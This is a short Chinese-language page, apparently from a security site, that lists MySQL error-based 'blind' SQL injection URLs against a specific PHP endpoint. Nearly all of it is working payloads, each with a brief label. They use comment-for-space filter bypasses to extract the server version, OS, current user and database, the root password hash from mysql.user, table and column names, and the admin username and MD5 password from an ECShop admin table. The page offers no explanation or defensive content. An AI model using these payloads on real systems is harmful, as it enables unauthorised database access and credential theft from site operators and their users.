mysql盲注常用语句
mysql盲注常用语句
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/@@version/**/),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
判断系统
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/@@version_compile_os/**/),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
当前user()
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/user()/**/),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
当前database()
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/database()/**/),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
暴root hash
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/Password/**/from/**/mysql.user/**/where/**/User=char(114,111,111,116)),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
当前 数据库表名
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/TABLE_NAME/**//**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA=char(115,97,110,115,97,110,49)/**/limit/**/6,1),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
当前 数据库user_name 字段
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**//**/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA=char(115,97,110,115,97,110,49)/**/and/**/TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)/**/limit/**/2,1),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
当前 数据库 字段password
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**//**/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA=char(115,97,110,115,97,110,49)/**/and/**/TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)/**/limit/**/4,1),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
获得admin passwd(md5)
http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/concat_ws(char(94),ifnull(cast(%60password%60/**/as/**/char),char(32)),ifnull(cast(%60user_name%60/**/as/**/char),char(32)))/**//**/from/**/sansan1.ecs_admin_user/**/limit/**/0,1),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/**/limit/**/1)%23
<< 上一篇
下一篇 >>